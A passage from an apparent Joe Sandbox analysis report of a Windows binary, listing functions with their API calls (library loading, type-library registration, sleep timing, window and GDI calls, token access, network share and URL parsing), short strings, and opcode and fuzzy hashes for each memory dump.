Part of subcall function 00923AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00923AD2
Part of subcall function 00923AA3: ___AdjustPointer.LIBCMT ref: 00923AED

_UnwindNestedFrames.LIBCMT ref: 00923B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00923B7C
CallCatchBlock.LIBVCRUNTIME ref: 00923BA4

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: c45cfd9289833697219fbfc37ffdc5a38e3f59788000561e3adfeac34a318302
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 44014C32100158BBDF126E95EC42EEB3F7EEF88754F048014FE4866125C736E961DBA0

Function 00933073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009013C6,00000000,00000000,?,0093301A,009013C6,00000000,00000000,00000000,?,0093328B,00000006,FlsSetValue), ref: 009330A5
GetLastError.KERNEL32(?,0093301A,009013C6,00000000,00000000,00000000,?,0093328B,00000006,FlsSetValue,009A2290,FlsSetValue,00000000,00000364,?,00932E46), ref: 009330B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0093301A,009013C6,00000000,00000000,00000000,?,0093328B,00000006,FlsSetValue,009A2290,FlsSetValue,00000000), ref: 009330BF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: bf7978149f64fb67778508d763dce5b5bbcab09e9a3834179fa1256aa9473857
Instruction ID: dca9fdda8f670bec2e4f1c85662573369b7ca879c3c82e101c7e1b5c528a74f2
Opcode Fuzzy Hash: bf7978149f64fb67778508d763dce5b5bbcab09e9a3834179fa1256aa9473857
Instruction Fuzzy Hash: 1C017B32399622ABCB344B7CAC84A577B9CAF05B71F208621F905E7150C721D901CEE0

Function 00967464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0096747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00967497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009674AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009674CA

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: d7cb6fc5468d3b3ae78e34612877a6ab6977a3ed9edeffb5dd45260d4b2b50c6
Instruction ID: a5bd36d76a3021b5a44d824de7a8f11019f2d17c4695522c5464b11b2055cc77
Opcode Fuzzy Hash: d7cb6fc5468d3b3ae78e34612877a6ab6977a3ed9edeffb5dd45260d4b2b50c6
Instruction Fuzzy Hash: 6511A1B53093149BE7208F98DD0CB92BBFDEB40B08F50896AA616D6161DB74E904DB60

Function 0096B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0096ACD3,?,00008000), ref: 0096B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0096ACD3,?,00008000), ref: 0096B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0096ACD3,?,00008000), ref: 0096B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0096ACD3,?,00008000), ref: 0096B126

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: db3a5a41a1b73606812ead313dedcaccb1f56845be739a3bb706a5fd05d8e8e0
Instruction ID: 85ac83a07f987700dd4fa23db4382910a4c579c233f426b8bbfbf0105f1b7663
Opcode Fuzzy Hash: db3a5a41a1b73606812ead313dedcaccb1f56845be739a3bb706a5fd05d8e8e0
Instruction Fuzzy Hash: 0311A170C0851CEBCF109FE8DD986EEBF78FF0A310F014086D941B2145DB3085909B55

Function 00962DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00962DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00962DD6
GetCurrentThreadId.KERNEL32 ref: 00962DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00962DE4

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 6014260858356e468fcf97ae42b80ec0ade67931e533605779bc7a8673bfa899
Instruction ID: 977f10b2112c0e2b8a6b2540a68a18357b1ec9c846f8a96370e5b62988a5c02d
Opcode Fuzzy Hash: 6014260858356e468fcf97ae42b80ec0ade67931e533605779bc7a8673bfa899
Instruction Fuzzy Hash: 76E092B11197247BDB201B769C0DFEB3E6CEF42BA1F400416F105D10909AA5C840D6B0

Function 00998863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00919639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00919693
Part of subcall function 00919639: SelectObject.GDI32(?,00000000), ref: 009196A2
Part of subcall function 00919639: BeginPath.GDI32(?), ref: 009196B9
Part of subcall function 00919639: SelectObject.GDI32(?,00000000), ref: 009196E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00998887
LineTo.GDI32(?,?,?), ref: 00998894
EndPath.GDI32(?), ref: 009988A4
StrokePath.GDI32(?), ref: 009988B2

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 870ad43c2b271063afab27171a468709568b5f6aa2dac83910b9c52bb32ec734
Instruction ID: 19955eff623bc5cdb5b838b5a21f4ff94936010919e15e692b737338f4f665d1
Opcode Fuzzy Hash: 870ad43c2b271063afab27171a468709568b5f6aa2dac83910b9c52bb32ec734
Instruction Fuzzy Hash: FFF05E3615A258FADF126F98AC09FCE3F59AF16350F048002FA11650E1C7755551EFF9

Function 009198B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009198CC
SetTextColor.GDI32(?,?), ref: 009198D6
SetBkMode.GDI32(?,00000001), ref: 009198E9
GetStockObject.GDI32(00000005), ref: 009198F1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: fcd8d9c525b56530344b26fe48c28643c58acd83f23a53f65d8a5f1f939834d1
Instruction ID: 8c328bb55c7ccc6dace14e3167b15029fc98a1d3ff0230a11b6a7cdd1da67c87
Opcode Fuzzy Hash: fcd8d9c525b56530344b26fe48c28643c58acd83f23a53f65d8a5f1f939834d1
Instruction Fuzzy Hash: 58E0657125C244ABDB215B79BC09BE87F15AB11336F04821AF6FA540E1C7714684AB11

Function 0096162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00961634
OpenThreadToken.ADVAPI32(00000000,?,?,?,009611D9), ref: 0096163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009611D9), ref: 00961648
OpenProcessToken.ADVAPI32(00000000,?,?,?,009611D9), ref: 0096164F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: c094782162d9884d6ca2a817ae2ef341efee8b24e2f15ec879e1517e057250a3
Instruction ID: c3551d3dea52b6e1b5799da4a538a70d25127989e0384c4ed53b4f6ec686faeb
Opcode Fuzzy Hash: c094782162d9884d6ca2a817ae2ef341efee8b24e2f15ec879e1517e057250a3
Instruction Fuzzy Hash: 3CE08CB6616211EBDB201FA8AE0EB8A3B7CAF44792F18880AF245D9080E7348440DB60

Function 0095D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0095D858
GetDC.USER32(00000000), ref: 0095D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0095D882
ReleaseDC.USER32(?), ref: 0095D8A3

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f7c582376530b3d2f42535bb5d222aaacbf4465c2f49b352efe0c17e13006f0c
Instruction ID: bf9bbc08432c035d8842497423672d66dc9f4bb4ccd977dbe327028e32924874
Opcode Fuzzy Hash: f7c582376530b3d2f42535bb5d222aaacbf4465c2f49b352efe0c17e13006f0c
Instruction Fuzzy Hash: 2DE01AF181420ADFCF419FA4DC0C66DBBB1FB08311F14840AE906E7250CB399941AF50

Function 0095D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0095D86C
GetDC.USER32(00000000), ref: 0095D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0095D882
ReleaseDC.USER32(?), ref: 0095D8A3

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 4b599f02e19d260a7c01f8f964bffe031b11a0371851cbd12effad06aa228449
Instruction ID: 450fb6a4c52c7a325cdebdc47515f77bdec6b261d9586662fd2c73a82636a09e
Opcode Fuzzy Hash: 4b599f02e19d260a7c01f8f964bffe031b11a0371851cbd12effad06aa228449
Instruction Fuzzy Hash: EDE09AF5914205DFCF519FA4DC0C66DBBB5BB48311F14844AE946E7250CB395941AF50

Function 00974D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00907620: _wcslen.LIBCMT ref: 00907625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00974ED4

Strings

*, xrefs: 00974E10
LPT, xrefs: 00974DFB

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 7f8917091175d0efecad1d44cf07abd1b270998bbd3c1b6c6db1db65ccf47e71
Instruction ID: 8d6f5f55519c0305734277e87a8e5518416437995290178fdc84a93d43c0d532
Opcode Fuzzy Hash: 7f8917091175d0efecad1d44cf07abd1b270998bbd3c1b6c6db1db65ccf47e71
Instruction Fuzzy Hash: 1F916076A042049FCB14DF58C484EAABBF5BF48314F19C099E80A9F3A2D735ED85CB91

Function 0092E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0092E30D

Strings

pow, xrefs: 0092E2E5, 0092E302

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 2bbc084f615503e3b97599be455e82d410880a9c083c4440fe27de50b7304a99
Instruction ID: d3c2a31dfe8b7d7aa99ce1b386a6f9ec35c8bfc8fea51f85340bbcbd999a03ba
Opcode Fuzzy Hash: 2bbc084f615503e3b97599be455e82d410880a9c083c4440fe27de50b7304a99
Instruction Fuzzy Hash: 0F5180A1A1C10296CB35B758ED81379BB9CEF40741F304D58E4E6422FDEB348CC59E86

Function 0091E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0091E1B1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 10837afefd9ba08a1522d7ad01d8a24c275ae3fa61658af12af0623c25d64a9e
Instruction ID: e823e3cdd284e7fa416dd6af5b16a1b6a25cd4a023394a38e8615eb49bf20daf
Opcode Fuzzy Hash: 10837afefd9ba08a1522d7ad01d8a24c275ae3fa61658af12af0623c25d64a9e
Instruction Fuzzy Hash: DC517631A0421ADFDB19DF28C090AFA7BACEF59310F248415FCA19B2C0D7359E86CB90

Function 0091F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0091F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0091F2BB

Strings

@, xrefs: 0091F2AF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 4bd75387630935450b87d6f27910795a2ef92f4b3f0b223bb54eac7ac91e7906
Instruction ID: afb3414cb9aa3f31d69ea0d69c6a74eb5be8f6ff9ea5291ba987a20dfa4a1ce0
Opcode Fuzzy Hash: 4bd75387630935450b87d6f27910795a2ef92f4b3f0b223bb54eac7ac91e7906
Instruction Fuzzy Hash: DD5135B18187459FD320AF50DC86BABBBF8FBC4310F81895DF299411A5EB309529CB67

Function 00985745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009857E0
_wcslen.LIBCMT ref: 009857EC

Strings

CALLARGARRAY, xrefs: 009857E6, 009857EB

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 06607b8111bbc6249ac84f1d9bac20525031594061ab7f6c5dca2983268ed99b
Instruction ID: 47824763e437f29436ca37c0027650a34f51f075eb96c38f545b94728c02eae0
Opcode Fuzzy Hash: 06607b8111bbc6249ac84f1d9bac20525031594061ab7f6c5dca2983268ed99b
Instruction Fuzzy Hash: 5F418471E002099FCB14EFA9C8819AEBBF5EF99314F11405AE505A73A1E7749D85CB50

Function 0097D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0097D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0097D13A

Strings

|, xrefs: 0097D10B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 2ad556522713559b1294709f4aae1d54036687712128cbdfdd318642de0b0782
Instruction ID: 33e3326c5af1fee6f217ece289eafbbddeea279c8c48326b82133a8389776140
Opcode Fuzzy Hash: 2ad556522713559b1294709f4aae1d54036687712128cbdfdd318642de0b0782
Instruction Fuzzy Hash: 5A313A71D01219AFCF15EFA4CC85AEE7FB9FF45300F404019F819A61A6D735AA16CB60

Function 0099356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00993621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0099365C

Strings

static, xrefs: 009935BC

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 9f23924b5a79e8ee96bbd98519526229f0d4286478e4414bd340f13bdd85e71c
Instruction ID: b4083157614b0a2eb2029057f028c743b92456f57cf7f80f6bbc17901ae94780
Opcode Fuzzy Hash: 9f23924b5a79e8ee96bbd98519526229f0d4286478e4414bd340f13bdd85e71c
Instruction Fuzzy Hash: 1C318A71110204AEDB20DF68DC81BBB73ADFF88724F00861AF9A9D7280DA31AD91D760

Function 00994537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0099461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00994634

Strings

', xrefs: 0099458E

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 8f0d3b51ce4846770768fa3c76bf75f07ab88aa898cd400c0d185bc06f6618c1
Instruction ID: 72d86f92c44ed273063cc62c39e6fc9b4e986229d69ba89364dcd2b4678ab5fe
Opcode Fuzzy Hash: 8f0d3b51ce4846770768fa3c76bf75f07ab88aa898cd400c0d185bc06f6618c1
Instruction Fuzzy Hash: 753117B5A013099FDF15CFA9C990BDA7BB9FB49300F11416AE905AB341D770A942CF90

Function 009931EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0099327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00993287

Strings

Combobox, xrefs: 00993249

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

